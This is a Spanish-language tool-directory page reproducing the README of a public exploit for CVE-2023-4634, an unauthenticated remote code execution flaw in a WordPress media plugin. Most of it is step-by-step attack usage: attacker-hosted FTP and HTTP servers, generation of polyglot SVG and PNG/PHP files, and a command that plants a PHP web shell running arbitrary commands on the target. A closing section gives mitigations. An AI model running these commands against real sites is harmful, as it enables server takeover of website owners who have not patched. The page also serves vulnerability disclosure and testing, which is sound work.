Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2023-4634 — CVE-2023-4634 | Kitploit
Herramientas/GitHubGitHub/patrowl/cve-2023-4634
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónRed TeamingDesarrollo de Payloads
GitHubpatrowl/cve-2023-4634

CVE-2023-4634

CVE-2023-4634

Ver Repositorio
479hace 5 mesesRevisado por Kitploit

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2023-4634

Exploit de RCE para el plugin Media-Library de WordPress < 3.10 (CVE-2023-4634)

Información

Patrowl descubrió una vulnerabilidad de RCE no autenticada en el plugin Media-Librairy-Assistant de WordPress en versiones < 3.10. El exploit no es trivial y requiere solo una pequeña configuración explicada a continuación.

El descubrimiento global y la explotación del exploit se pueden encontrar en nuestro blog: https://patrowl.io/blog-wordpress-media-library-rce-cve-2023-4634/

Requisitos previos de explotación

  • WordPress instalado (todas las versiones funcionarán)
  • Media-Library-Assistant en versión < 3.10 (https://fr.wordpress.org/plugins/media-library-assistant/)
  • Librerías Imagick instaladas en el servidor
  • Configuración predeterminada de Imagick
  • Conectividad de red externa

Detección

La detección de la vulnerabilidad se puede realizar mediante una comprobación básica de DNS en un servidor FTP remoto. La plantilla de nuclei se puede encontrar en: CVE-2023-4634.yaml.

root@kitploit:~
nuclei -u http://x.x.x.x -t ./CVE-2023-4634.yaml

La explotación completa y el RCE se pueden realizar entonces con el script CVE-2023-4634.py.

Nota: También puedes usar el script para desencadenar explotaciones más sencillas, como LFI; solo necesitas forjar un SVG específico y alojarlo en tu FTP. Sigue las recomendaciones de nuestro blog.

Uso

Instala los requisitos:

root@kitploit:~
python3 -m pip install -r requirements.txt

Luego

root@kitploit:~
python3 CVE-CVE-2023-4634.py -h

Te da:

root@kitploit:~
usage: CVE-2023-4634 Exploit [-h] [--target [TARGET]] [--remoteftp [REMOTEFTP]] [--remotehttp [REMOTEHTTP]] [--svg_polyglot_name [SVG_POLYGLOT_NAME]] [--svg_exploiter_names [SVG_EXPLOITER_NAMES]] [--png_polyglot_name [PNG_POLYGLOT_NAME]] [--concurrency [CONCURRENCY]] [--generatesvg | --no-generatesvg] [--webserverpath WEBSERVERPATH]
                             [--exploitname EXPLOITNAME] [--generatepng | --no-generatepng] [--payload PAYLOAD]

Exploit CVE-2023-4634 on Media-Library-Assistant version < 3.10

options:
  -h, --help            show this help message and exit
  --target [TARGET]     URL of the Target, ex http://victimwordpress.org
  --remoteftp [REMOTEFTP]
                        URL of the remote FTP use to store SVGs files, ex ftp://X.X.X.X:PORT
  --remotehttp [REMOTEHTTP]
                        URL of the remote HTTP use to store the final Polyglot PNG/PHP file, ex http://X.X.X.X:PORT
  --svg_polyglot_name [SVG_POLYGLOT_NAME]
                        Name of the external polyglot SVG/MSL file used (for generation or final usage), example : poly.svg
  --svg_exploiter_names [SVG_EXPLOITER_NAMES]
                        Name of the external VID bruteforcers file use, the FUZZ part will be replaced by the first letter bruteforced (for generation or final usage), ex: exploiter_FUZZ.svg
  --png_polyglot_name [PNG_POLYGLOT_NAME]
                        Name of the external PNG/PHP to use (for generation or final usage), ex: exploiter_FUZZ.svg
  --concurrency [CONCURRENCY]
                        Number of concurrent long SVG conversion requests to make ( default 100 )
  --generatesvg, --no-generatesvg
                        Generate both polyglot SVG/MSL file and VID bruteforcer within the remote_ftp directory
  --webserverpath WEBSERVERPATH
                        Path of the webserver on the victim server (could be found with the LFI and wp-config file) example: /var/www/html
  --exploitname EXPLOITNAME
                        Dropped exploit name example: pwned.php
  --generatepng, --no-generatepng
                        Generate polyglot PNG/PHP file, integrate php file with -payload option in exploit-png folder
  --payload PAYLOAD     PHP Payload to integrate in the PNG file ex: <?php phpinfo(); ?>

Ahora, para que funcione, necesitas configurar en hosts remotos:

  • 1 servidor FTP que aloje los exploiters políglotas SVG/MSL y SVG/VID
  • 1 servidor HTTP que aloje el PNG/MSL políglota

Antes de la explotación

Prepara tu servidor FTP

Puedes ejecutar un servidor FTP sencillo usando Python:

root@kitploit:~
python3 -m pyftpdlib -p 2122
[I 2023-08-31 12:24:17] concurrency model: async
[I 2023-08-31 12:24:17] masquerade (NAT) address: None
[I 2023-08-31 12:24:17] passive ports: None
[I 2023-08-31 12:24:17] >>> starting FTP server on 0.0.0.0:2122, pid=482661 <<<

Una vez configurado, debes añadir a tus servidores FTP los archivos políglotas SVG/MSL y todos los exploiters SVG; puedes generarlos fácilmente con el script:

root@kitploit:~
python3 CVE-2023-4634.py --generatesvg --svg_polyglot_name poly.svg --svg_exploiter_names exploiter_FUZZ.svg  --remotehttp http://192.168.1.164:8081 --png_polyglot_name virus.png  --webserverpath /var/www/html --exploitname pwned.php

Generará en la carpeta remote_ftp:

  • poly.svg, SVG/MSL políglota con una dirección no enrutable que hará que el objetivo tarde mucho tiempo en generarlo, con un MSL que almacenará el png_polyglot_name desde remotettp en la ruta de destino (webserverpath + exploitname).
  • los 64 exploiters SVG/VID que usan la nomenclatura exploiter_FUZZ, donde FUZZ se reemplazará por el carácter probado por fuerza bruta.

Ten en cuenta que el script también copiará el archivo SVG con [0] al final (poly.svg y poly.svg[0]). Ambos archivos son necesarios para que la explotación funcione.

Coloca todos los archivos generados (normales y [0]) en el directorio raíz de tu servidor FTP.

Debería verse así:

root@kitploit:~
ls remote_ftp/
exploiter_-.svg    exploiter_3.svg    exploiter_7.svg    exploiter_B.svg    exploiter_F.svg    exploiter_J.svg    exploiter_N.svg    exploiter_R.svg    exploiter_V.svg    exploiter_Z.svg
exploiter_-.svg[0] exploiter_3.svg[0] exploiter_7.svg[0] exploiter_B.svg[0] exploiter_F.svg[0] exploiter_J.svg[0] exploiter_N.svg[0] exploiter_R.svg[0] exploiter_V.svg[0] exploiter_Z.svg[0]
exploiter_0.svg    exploiter_4.svg    exploiter_8.svg    exploiter_C.svg    exploiter_G.svg    exploiter_K.svg    exploiter_O.svg    exploiter_S.svg    exploiter_W.svg    exploiter__.svg
exploiter_0.svg[0] exploiter_4.svg[0] exploiter_8.svg[0] exploiter_C.svg[0] exploiter_G.svg[0] exploiter_K.svg[0] exploiter_O.svg[0] exploiter_S.svg[0] exploiter_W.svg[0] exploiter__.svg[0]
exploiter_1.svg    exploiter_5.svg    exploiter_9.svg    exploiter_D.svg    exploiter_H.svg    exploiter_L.svg    exploiter_P.svg    exploiter_T.svg    exploiter_X.svg    poly.svg
exploiter_1.svg[0] exploiter_5.svg[0] exploiter_9.svg[0] exploiter_D.svg[0] exploiter_H.svg[0] exploiter_L.svg[0] exploiter_P.svg[0] exploiter_T.svg[0] exploiter_X.svg[0] poly.svg[0]
exploiter_2.svg    exploiter_6.svg    exploiter_A.svg    exploiter_E.svg    exploiter_I.svg    exploiter_M.svg    exploiter_Q.svg    exploiter_U.svg    exploiter_Y.svg
exploiter_2.svg[0] exploiter_6.svg[0] exploiter_A.svg[0] exploiter_E.svg[0] exploiter_I.svg[0] exploiter_M.svg[0] exploiter_Q.svg[0] exploiter_U.svg[0] exploiter_Y.svg[0]

Prepara tu servidor HTTP

Puedes ejecutar un servidor HTTP sencillo usando Python:

root@kitploit:~
python3 -m http.server -p 8081
[I 2023-08-31 12:24:17] concurrency model: async
[I 2023-08-31 12:24:17] masquerade (NAT) address: None
[I 2023-08-31 12:24:17] passive ports: None
[I 2023-08-31 12:24:17] >>> starting FTP server on 0.0.0.0:2122, pid=482661 <<<

Solo necesitas añadir tu archivo PNG/PHP políglota. También puedes usar el script para generar el archivo e incluir el payload deseado:

root@kitploit:~
python3 CVE-2023-4634.py --generatepng --payload "<?php if(isset(\$_REQUEST['cmd'])){ echo \"<pre>\"; \$cmd = (\$_REQUEST['cmd']); system(\$cmd); echo \"</pre>\"; die; }?>" --png_polyglot_name virus.png

Explotación

Ahora que tanto el servidor FTP remoto como el servidor HTTP están listos, puedes lanzar la explotación contra el objetivo vulnerable (el script comprobará si el objetivo usa una versión vulnerable del plugin). Ejemplo:

root@kitploit:~
python3 CVE-2023-4634.py --target http://127.0.0.1 --remoteftp ftp://192.168.1.164:2122 --remotehttp http://192.168.1.164:8081 --svg_polyglot_name poly.svg --svg_exploiter_names exploiter_FUZZ.svg --png_polyglot_name virus.png  --exploitname pwned.php

Y si todo está bien, deberías tener tu exploitname alojado dentro de webserverpath (depende de cómo configures tu exploit). ¡Disfruta!

Videoclip

He creado un videoclip.

https://github.com/Patrowl/CVE-2023-4634/assets/15944951/6f9d356f-f0ec-48df-9037-5f8a4b64e44f

Mitigaciones

  • Actualiza a la última versión del plugin (https://fr.wordpress.org/plugins/media-library-assistant/)
  • Refuerza la política de seguridad de Imagick deshabilitando la conversión de archivos peligrosos como: "MSL, MSVG, MVG, PS, PDF, RSVG, SVG, XPS, VID".

Se puede hacer añadiendo

root@kitploit:~
  <policy domain="coder" rights="none" pattern="SVG" />
  <policy domain="coder" rights="none" pattern="MSL" />
  <policy domain="coder" rights="none" pattern="MSVG" />
  <policy domain="coder" rights="none" pattern="MVG" />
  <policy domain="coder" rights="none" pattern="VID" />

a

root@kitploit:~
/etc/ImageMagick-X/policy.xml
Descargar herramienta